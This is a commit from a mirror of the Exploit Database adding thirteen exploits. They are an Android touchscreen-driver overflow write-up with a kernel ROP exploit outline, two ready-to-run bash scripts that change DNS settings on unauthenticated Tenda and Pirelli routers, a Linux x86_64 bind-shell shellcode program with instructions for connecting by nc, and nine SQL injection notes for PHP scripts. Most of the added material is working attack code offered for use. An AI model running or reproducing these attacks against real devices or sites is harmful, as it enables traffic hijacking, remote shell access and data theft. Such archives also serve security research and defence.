bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-01-20

Browse source 
13 new exploits

Google Android TSP sysfs - 'cmd_store' Multiple Overflows

Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)

Tenda ADSL2/2+ Modem D820R - Unauthenticated DNS Change
Pirelli DRG A115 v3 ADSL Router - Unauthenticated DNS Change
Viral Image & Video Sharing GagZone Script - SQL Injection
Image and Video Script - SQL Injection
Social News and Bookmarking Script - SQL Injection
Viral Image Sharing Script - SQL Injection
Vine VideoSite Creator Script - SQL Injection
Job Vacancy Script - SQL Injection
Home of Viral Images_ Videos and Articles Script - SQL Injection
Video Site Creator Script - SQL Injection
Classifieds Script - SQL Injection
This commit is contained in:
Offensive Security 2017-01-20 05:01:18 +00:00
parent ef112ace5d
commit 1441edc4aa
14 changed files with 463 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
files.csv
View file

@ -8757,6 +8757,7 @@ id,file,description,date,author,platform,type,port
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0 41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0 41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
41090,platforms/windows/local/41090.py,"SentryHD 02.01.12e - Privilege Escalation",2017-01-18,"Kacper Szurek",windows,local,0 41090,platforms/windows/local/41090.py,"SentryHD 02.01.12e - Privilege Escalation",2017-01-18,"Kacper Szurek",windows,local,0
41130,platforms/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",android,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15830,6 +15831,7 @@ id,file,description,date,author,platform,type,port
40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37049,4 +37051,15 @@ id,file,description,date,author,platform,type,port
41112,platforms/php/webapps/41112.txt,"Study Abroad Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0 41112,platforms/php/webapps/41112.txt,"Study Abroad Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
41113,platforms/php/webapps/41113.txt,"Courier Management System - SQL Injection",2017-01-17,"Sibusiso Sishi",php,webapps,0 41113,platforms/php/webapps/41113.txt,"Courier Management System - SQL Injection",2017-01-17,"Sibusiso Sishi",php,webapps,0
41114,platforms/php/webapps/41114.txt,"Flippa Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0 41114,platforms/php/webapps/41114.txt,"Flippa Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
41117,platforms/hardware/webapps/41117.sh,"Tenda ADSL2/2+ Modem D820R - Unauthenticated DNS Change",2017-01-19,"Todor Donev",hardware,webapps,0
41116,platforms/php/webapps/41116.txt,"B2B Script 4.27 - SQL Injection",2017-01-18,"Dawid Morawski",php,webapps,0 41116,platforms/php/webapps/41116.txt,"B2B Script 4.27 - SQL Injection",2017-01-18,"Dawid Morawski",php,webapps,0
41118,platforms/hardware/webapps/41118.sh,"Pirelli DRG A115 v3 ADSL Router - Unauthenticated DNS Change",2017-01-19,"Todor Donev",hardware,webapps,0
41119,platforms/php/webapps/41119.txt,"Viral Image & Video Sharing GagZone Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
41120,platforms/php/webapps/41120.txt,"Image and Video Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
41121,platforms/php/webapps/41121.txt,"Social News and Bookmarking Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
41122,platforms/php/webapps/41122.txt,"Viral Image Sharing Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
41123,platforms/php/webapps/41123.txt,"Vine VideoSite Creator Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
41124,platforms/php/webapps/41124.txt,"Job Vacancy Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
41125,platforms/php/webapps/41125.txt,"Home of Viral Images_ Videos and Articles Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
41126,platforms/php/webapps/41126.txt,"Video Site Creator Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
41127,platforms/php/webapps/41127.txt,"Classifieds Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

73
platforms/android/local/41130.txt Executable file
View file

@ -0,0 +1,73 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=967
The TSP touchscreen controller driver exposes several sysfs entries through which the driver may be configured. One such entry, "cmd", allows the user to write commands to be executed by the driver.
Specifically, the "cmd" entry is writable, and is present under:
/sys/devices/virtual/sec/tsp/cmd
Writes to this sysfs entry are handled by the function "cmd_store", under drivers/input/touchscreen/sec_ts/sec_ts_fn.c
This function fails to validate the length of the supplied buffer, before copying data from it into two memory locations. First, the data is copied into a static structure:
...
memset(ts->cmd, 0x00, sizeof(ts->cmd));
memcpy(ts->cmd, buf, length);
memset(ts->cmd_param, 0, sizeof(ts->cmd_param));
memset(buffer, 0x00, sizeof(buffer));
...
The "buf" argument contains the user-supplied data, and the "length" argument is completely user-controlled. Since the length of ts->cmd is defined to be CMD_STR_LEN (256), this memcpy will overflow into adjacent fields in the "ts" structure, allowing the attack to replace these with attack-controlled data.
Second, the user-supplied data is copied into a local stack-allocated buffer, like so:
...
char buffer[CMD_STR_LEN];
...
pos = strchr(buf, (int)delim);
if (pos)
memcpy(buffer, buf, pos - buf);
else
memcpy(buffer, buf, length);
...
This means that the attacker can also overwrite the data on the stack, including the value of frame pointer and return address, simply by providing a buffer of length >CMD_STR_LEN. This allows the attacker to directly hijack the control flow when the function returns.
I've statically and dynamically verified this issue on an SM-G935F device. The open-source kernel package I analysed was "SM-G935F_MM_Opensource", the device's build is "XXS1APG3".
The sysfs entries mentioned above have UID "system" and GID "radio". The SELinux context for these entries is: "u:object_r:sysfs_sec:s0".
According to the default SELinux rules as present on the SM-G935F (version XXS1APG3), the following contexts may access these files:
allow shell sysfs_sec : file { read open } ;
allow system_app sysfs_sec : file { ioctl read write getattr lock append open } ;
allow rild sysfs_sec : file { ioctl read write getattr lock append open } ;
allow system_app sysfs_sec : dir { ioctl read write getattr add_name remove_name search open } ;
allow diagexe sysfs_sec : file { ioctl read write getattr lock append open } ;
allow at_distributor sysfs_sec : file { ioctl read write getattr setattr lock append open } ;
Proof of concept for the buffer overflow in the TSP driver.
Includes a short ROP chain which allows execution of any arbitrary function in the context of the linux kernel, with arbitrary arguments. This PoC also uses the KASLR bypass in "pm_qos" to adjust for the KASLR slide).
The high-level flow for executing a function in the kernel is the following:
-Allocate a (user-space) buffer on the heap with a dummy "marker" value
-Start a new thread (denote it "Thread B", denote the original thread "Thread A")
-Thread A:
-Perform a busy loop waiting for the dummy value to be updated
-Thread B:
-Create a ROP chain which does the following:
-Prepares arguments for a function call
-Calls the wanted function in the context of the kernel
-Stores X0 in a sysfs entry in the kernel VAS (e.g., uevent_seqnum)
-Change the dummy value shared from thread A to indicate completion
-Enter idle loop
-Thread A:
-(Exit busy loop as the marker value has been modified)
-Read the result of the execution by reading the sysfs entry
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41130.zip

83
platforms/hardware/webapps/41117.sh Executable file
View file

@ -0,0 +1,83 @@
#!/bin/bash
#
# Tenda ADSL2/2+ Modem D820R
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# The malicious code doesn't sleeping, he stalking..
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Tenda ADSL2/2+ Modem D820R "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

83
platforms/hardware/webapps/41118.sh Executable file
View file

@ -0,0 +1,83 @@
#!/bin/bash
#
# Pirelli DRG A115 v3 ADSL Router
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# The malicious code doesn't sleeping, he stalking..
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Pirelli DRG A115 v3 "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

85
platforms/lin_x86-64/shellcode/41128.c Executable file
View file

@ -0,0 +1,85 @@
/*
---------------------------------------------------------------------------------------------------
Linux/x86_64 - Bind 5600 TCP Port - shellcode - 87 bytes
Ajith Kp [ http://fb.com/ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
0000000000400080 <.text>:
400080: 48 31 c0 xor %rax,%rax
400083: 48 31 d2 xor %rdx,%rdx
400086: 48 31 f6 xor %rsi,%rsi
400089: ff c6 inc %esi
40008b: 6a 29 pushq $0x29
40008d: 58 pop %rax
40008e: 6a 02 pushq $0x2
400090: 5f pop %rdi
400091: 0f 05 syscall
400093: 48 97 xchg %rax,%rdi
400095: 6a 02 pushq $0x2
400097: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp)
40009e: 54 push %rsp
40009f: 5e pop %rsi
4000a0: 52 push %rdx
4000a1: 6a 31 pushq $0x31
4000a3: 58 pop %rax
4000a4: 6a 10 pushq $0x10
4000a6: 5a pop %rdx
4000a7: 0f 05 syscall
4000a9: 5e pop %rsi
4000aa: 6a 32 pushq $0x32
4000ac: 58 pop %rax
4000ad: 0f 05 syscall
4000af: 6a 2b pushq $0x2b
4000b1: 58 pop %rax
4000b2: 0f 05 syscall
4000b4: 48 97 xchg %rax,%rdi
4000b6: 6a 03 pushq $0x3
4000b8: 5e pop %rsi
4000b9: ff ce dec %esi
4000bb: b0 21 mov $0x21,%al
4000bd: 0f 05 syscall
4000bf: 75 f8 jne 0x4000b9
4000c1: f7 e6 mul %esi
4000c3: 52 push %rdx
4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
4000cb: 2f 73 68
4000ce: 53 push %rbx
4000cf: 48 8d 3c 24 lea (%rsp),%rdi
4000d3: b0 3b mov $0x3b,%al
4000d5: 0f 05 syscall
---------------------------------------------------------------------------------------------------
How To Run
$ gcc -o bind_shell bind_shell.c
$ execstack -s bind_shell
$ ./bind_shell
How to Connect
$ nc <HOST IP ADDRESS> 5600
Eg:
$ nc 127.0.0.1 5600
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}

14
platforms/php/webapps/41119.txt Executable file
View file

@ -0,0 +1,14 @@
# # # # #
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Viral Image & Video Sharing GagZone Script
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-gagzone/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c....
# # # # #

14
platforms/php/webapps/41120.txt Executable file
View file

@ -0,0 +1,14 @@
# # # # #
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Image and Video Script
# Script Buy Now: http://www.scriptfolder.com/funzone-image-and-video-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c....
# # # # #

14
platforms/php/webapps/41121.txt Executable file
View file

@ -0,0 +1,14 @@
# # # # #
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Social News and Bookmarking Script
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-bookmark-drive-social-news-and-bookmarking-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c....
# # # # #

14
platforms/php/webapps/41122.txt Executable file
View file

@ -0,0 +1,14 @@
# # # # #
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Viral Image Sharing Script
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-imagegags-viral-image-sharing-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c....
# # # # #

14
platforms/php/webapps/41123.txt Executable file
View file

@ -0,0 +1,14 @@
# # # # #
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Vine VideoSite Creator Script
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-vinezone-vine-videosite-creator-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c....
# # # # #

14
platforms/php/webapps/41124.txt Executable file
View file

@ -0,0 +1,14 @@
# # # # #
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Job Vacancy Script
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-job-bank-job-vacancy-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c....
# # # # #

14
platforms/php/webapps/41125.txt Executable file
View file

@ -0,0 +1,14 @@
# # # # #
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Home of Viral Images, Videos and Articles Script
# Script Buy Now: http://www.scriptfolder.com/viralzone-home-of-viral-images-videos-and-articles/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c....
# # # # #

14
platforms/php/webapps/41126.txt Executable file
View file

@ -0,0 +1,14 @@
# # # # #
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: VideoZone - Video Site Creator Script
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-videozone-video-site-creator/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c....
# # # # #

14
platforms/php/webapps/41127.txt Executable file
View file

@ -0,0 +1,14 @@
# # # # #
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Classifieds Script
# Script Buy Now:http://www.scriptfolder.com/scriptfolder-classifieds/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# E.t.c....
# # # # #